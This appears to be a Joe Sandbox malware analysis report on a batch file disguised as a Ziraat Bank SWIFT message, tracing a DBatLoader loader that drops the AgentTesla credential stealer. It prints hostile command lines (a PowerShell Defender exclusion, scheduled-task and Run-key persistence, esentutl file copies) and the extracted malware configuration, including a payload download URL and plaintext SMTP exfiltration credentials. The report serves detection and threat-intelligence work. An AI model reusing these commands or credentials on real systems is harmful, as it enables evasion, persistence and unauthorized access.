Edit tour

Windows Analysis Report
Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat

Overview

General Information

Sample name:	Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat
Analysis ID:	1553795
MD5:	9096921da7521dd3a36a5fb35fc84fa9
SHA1:	bcf834c98de442f75b21e053c3b9d893aebb5b24
SHA256:	769f8dac244efda700b8d9e966a8b33c4b27aa8180d7898f9a829210076d3066
Tags:	batgeoTURuser-lowmal3
Infos:

Detection

AgentTesla, DBatLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected AgentTesla

Yara detected DBatLoader

.NET source code contains very large strings

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Contains functionality to register a low level keyboard hook

Drops PE files to the user root directory

Drops PE files with a suspicious file extension

Drops executable to a common third party application directory

Drops or copies cmd.exe with a different name (likely to bypass HIPS)

Found large BAT file

Infects executable files (exe, dll, sys, html)

Installs a global keyboard hook

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Sample uses process hollowing technique

Sigma detected: DLL Search Order Hijackig Via Additional Space in Path

Sigma detected: Execution from Suspicious Folder

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality to call native functions

Contains functionality to check if a connection to the internet is available

Contains functionality to dynamically determine API calls

Contains functionality to launch a process as a different user

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates a window with clipboard capturing capabilities

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the user directory

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: Powershell Defender Exclusion

Sigma detected: Startup Folder File Write

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Outbound SMTP Connections

Sigma detected: Suspicious Schtasks From Env Var Folder

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

cmd.exe (PID: 2856 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

extrac32.exe (PID: 2848 cmdline: extrac32 /y "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat" "C:\Users\user\AppData\Local\Temp\x.exe" MD5: 41330D97BF17D07CD4308264F3032547)

x.exe (PID: 4424 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: BDC3B662D1136F20F51F55A0F6A2FB9D)

cmd.exe (PID: 3576 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\lxsyrsiW.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

esentutl.exe (PID: 6188 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)

esentutl.exe (PID: 6544 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)

esentutl.exe (PID: 4884 cmdline: C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\AppData\Local\Temp\x.exe /d C:\\Users\\Public\\Libraries\\Wisrysxl.PIF /o MD5: 5F5105050FBE68E930486635C5557F84)

conhost.exe (PID: 5724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

lxsyrsiW.pif (PID: 4676 cmdline: C:\Users\Public\Libraries\lxsyrsiW.pif MD5: C116D3604CEAFE7057D77FF27552C215)

neworigin.exe (PID: 4352 cmdline: "C:\Users\user\AppData\Local\Temp\neworigin.exe" MD5: D6A4CF0966D24C1EA836BA9A899751E5)

server_BTC.exe (PID: 3160 cmdline: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" MD5: 50D015016F20DA0905FD5B37D7834823)

powershell.exe (PID: 3832 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 4568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7260 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 5828 cmdline: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 12:07 /du 23:59 /sc daily /ri 1 /f MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 6832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

TrojanAIbot.exe (PID: 5212 cmdline: "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" MD5: 50D015016F20DA0905FD5B37D7834823)

cmd.exe (PID: 5180 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp692E.tmp.cmd"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 4820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

timeout.exe (PID: 6544 cmdline: timeout 6 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

TrojanAIbot.exe (PID: 5352 cmdline: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe MD5: 50D015016F20DA0905FD5B37D7834823)

Wisrysxl.PIF (PID: 7456 cmdline: "C:\Users\Public\Libraries\Wisrysxl.PIF" MD5: BDC3B662D1136F20F51F55A0F6A2FB9D)

lxsyrsiW.pif (PID: 7520 cmdline: C:\Users\Public\Libraries\lxsyrsiW.pif MD5: C116D3604CEAFE7057D77FF27552C215)

neworigin.exe (PID: 7572 cmdline: "C:\Users\user\AppData\Local\Temp\neworigin.exe" MD5: D6A4CF0966D24C1EA836BA9A899751E5)

server_BTC.exe (PID: 7588 cmdline: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" MD5: 50D015016F20DA0905FD5B37D7834823)

Wisrysxl.PIF (PID: 7740 cmdline: "C:\Users\Public\Libraries\Wisrysxl.PIF" MD5: BDC3B662D1136F20F51F55A0F6A2FB9D)

lxsyrsiW.pif (PID: 7796 cmdline: C:\Users\Public\Libraries\lxsyrsiW.pif MD5: C116D3604CEAFE7057D77FF27552C215)

neworigin.exe (PID: 7852 cmdline: "C:\Users\user\AppData\Local\Temp\neworigin.exe" MD5: D6A4CF0966D24C1EA836BA9A899751E5)

server_BTC.exe (PID: 7876 cmdline: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" MD5: 50D015016F20DA0905FD5B37D7834823)

TrojanAIbot.exe (PID: 8020 cmdline: "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" MD5: 50D015016F20DA0905FD5B37D7834823)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://0xmrmagnezi.github.io/malware%20analysis/AgentTesla/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Name	Description	Attribution	Blogpost URLs	Link
DBatLoader	This Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.	No Attribution	https://blog.vincss.net/2020/09/re016-malware-analysis-modiloader-eng.html https://blog.vincss.net/re016-malware-analysis-modiloader/ https://gi7w0rm.medium.com/uncovering-ddgroup-a-long-time-threat-actor-d3b3020625a4 https://isc.sans.edu/diary/Malspam+pushes+ModiLoader+DBatLoader+infection+for+Remcos+RAT/29896 https://kienmanowar.wordpress.com/2024/04/09/quicknote-phishing-email-distributes-warzone-rat-via-dbatloader/	https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Malware Configuration

Threatname: DBatLoader

{"Download Url": ["https://gxe0.com/yak/233_Wisrysxlfss"]}

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "s82.gocheapweb.com", "Username": "info2@j-fores.com", "Password": "london@1759"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\neworigin.exe	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\neworigin.exe	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
C:\Users\user\AppData\Local\Temp\neworigin.exe	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3587b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x358ed:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x35977:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x35a09:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x35a73:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x35ae5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x35b7b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x35c0b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548

Memory Dumps

Source	Rule	Description	Author
0000001C.00000002.2693859207.0000000002CC4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000D.00000002.1691089667.00000000030C9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000001C.00000002.2693859207.0000000002CBC000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000020.00000002.2692159904.000000000307C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000001C.00000002.2693859207.0000000002C91000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001C.00000002.2693859207.0000000002C91000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000D.00000000.1512401609.0000000000D92000.00000002.00000001.01000000.00000009.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000D.00000000.1512401609.0000000000D92000.00000002.00000001.01000000.00000009.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000020.00000002.2692159904.0000000003084000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000004.00000003.1444132666.000000007FAD0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
0000000D.00000002.1691089667.00000000030D3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000D.00000002.1691089667.00000000030A1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000D.00000002.1691089667.00000000030A1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000020.00000002.2692159904.0000000003051000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000020.00000002.2692159904.0000000003051000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: neworigin.exe PID: 4352	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: neworigin.exe PID: 4352	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: neworigin.exe PID: 7572	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: neworigin.exe PID: 7572	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Click to see the 14 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
13.0.neworigin.exe.d90000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
13.0.neworigin.exe.d90000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
13.0.neworigin.exe.d90000.0.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3587b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x358ed:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x35977:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x35a09:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x35a73:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x35ae5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x35b7b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x35c0b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
4.2.x.exe.2a00000.0.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security

Sigma Signatures

System Summary

Sigma detected: DLL Search Order Hijackig Via Additional Space in Path

Source: File created

Author: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 4424, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll

Sigma detected: Execution from Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Libraries\lxsyrsiW.pif, CommandLine: C:\Users\Public\Libraries\lxsyrsiW.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\lxsyrsiW.pif, NewProcessName: C:\Users\Public\Libraries\lxsyrsiW.pif, OriginalFileName: C:\Users\Public\Libraries\lxsyrsiW.pif, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\x.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\x.exe, ParentProcessId: 4424, ParentProcessName: x.exe, ProcessCommandLine: C:\Users\Public\Libraries\lxsyrsiW.pif, ProcessId: 4676, ProcessName: lxsyrsiW.pif

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Wisrysxl.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 4424, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Wisrysxl

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 3160, ParentProcessName: server_BTC.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 3832, ProcessName: powershell.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Wisrysxl.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 4424, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Wisrysxl

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: C:\Users\Public\Libraries\lxsyrsiW.pif, CommandLine: C:\Users\Public\Libraries\lxsyrsiW.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\lxsyrsiW.pif, NewProcessName: C:\Users\Public\Libraries\lxsyrsiW.pif, OriginalFileName: C:\Users\Public\Libraries\lxsyrsiW.pif, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\x.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\x.exe, ParentProcessId: 4424, ParentProcessName: x.exe, ProcessCommandLine: C:\Users\Public\Libraries\lxsyrsiW.pif, ProcessId: 4676, ProcessName: lxsyrsiW.pif

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ProcessId: 3160, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 12:07 /du 23:59 /sc daily /ri 1 /f, CommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 12:07 /du 23:59 /sc daily /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 3160, ParentProcessName: server_BTC.exe, ProcessCommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 12:07 /du 23:59 /sc daily /ri 1 /f, ProcessId: 5828, ProcessName: schtasks.exe

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 51.195.88.199, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\AppData\Local\Temp\neworigin.exe, Initiated: true, ProcessId: 4352, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49708

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 3160, ParentProcessName: server_BTC.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 3832, ProcessName: powershell.exe

Suricata Signatures

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-11T18:02:43.410691+0100	2022930	1	A Network Trojan was detected	4.245.163.56	443	192.168.2.8	49709	TCP
2024-11-11T18:03:21.873238+0100	2022930	1	A Network Trojan was detected	4.245.163.56	443	192.168.2.8	49721	TCP

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-11T18:02:28.043830+0100	2028371	3	Unknown Traffic	192.168.2.8	49706	198.252.105.91	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Avira: detection malicious, Label: HEUR/AGEN.1311721
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Avira: detection malicious, Label: TR/Spy.Gen8
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Avira: detection malicious, Label: HEUR/AGEN.1326052
Source: C:\Users\user\AppData\Local\Temp\x.exe	Avira: detection malicious, Label: HEUR/AGEN.1326052
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Avira: detection malicious, Label: HEUR/AGEN.1311721
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Avira: detection malicious, Label: W32/Infector.Gen

Found malware configuration

Source: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat	Malware Configuration Extractor: DBatLoader {"Download Url": ["https://gxe0.com/yak/233_Wisrysxlfss"]}
Source: 13.0.neworigin.exe.d90000.0.unpack	Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "s82.gocheapweb.com", "Username": "info2@j-fores.com", "Password": "london@1759"}

Multi AV Scanner detection for dropped file

Source: C:\Users\Public\Libraries\Wisrysxl.PIF	ReversingLabs: Detection: 23%
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Local\Temp\x.exe	ReversingLabs: Detection: 23%
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	ReversingLabs: Detection: 65%

Multi AV Scanner detection for submitted file

Source: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat

ReversingLabs: Detection: 23%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Joe Sandbox ML: detected
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\x.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Joe Sandbox ML: detected

Source: unknown	HTTPS traffic detected: 198.252.105.91:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.8:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.8:49718 version: TLS 1.2

Source:	Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: x.exe, 00000004.00000002.1536799829.000000007EC67000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E2A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E327000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1476291402.000000007F120000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdb source: x.exe, x.exe, 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1526389874.00000000206E3000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1443292232.000000007FCE0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1536799829.000000007EC67000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1444132666.000000007FAD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E2A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E327000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1526389874.0000000020787000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1476291402.000000007F120000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: cmd.pdbUGP source: esentutl.exe, 00000008.00000003.1493765037.00000000054E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ping.pdbGCTL source: esentutl.exe, 00000009.00000003.1497786383.0000000004A20000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdbH source: x.exe, 00000004.00000002.1536799829.000000007EC67000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E2A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E327000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1476291402.000000007F120000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdbGCTL source: x.exe, 00000004.00000003.1497081210.0000000021C10000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.1497081210.0000000021C3F000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1526389874.00000000206E3000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1443906217.00000000027DB000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.1443292232.000000007FCE0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1444132666.000000007FAD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1510941907.00000000027DD000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1526389874.0000000020787000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: cmd.pdb source: esentutl.exe, 00000008.00000003.1493765037.00000000054E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ping.pdb source: esentutl.exe, 00000009.00000003.1497786383.0000000004A20000.00000004.00001000.00020000.00000000.sdmp

Spreading

Infects executable files (exe, dll, sys, html)

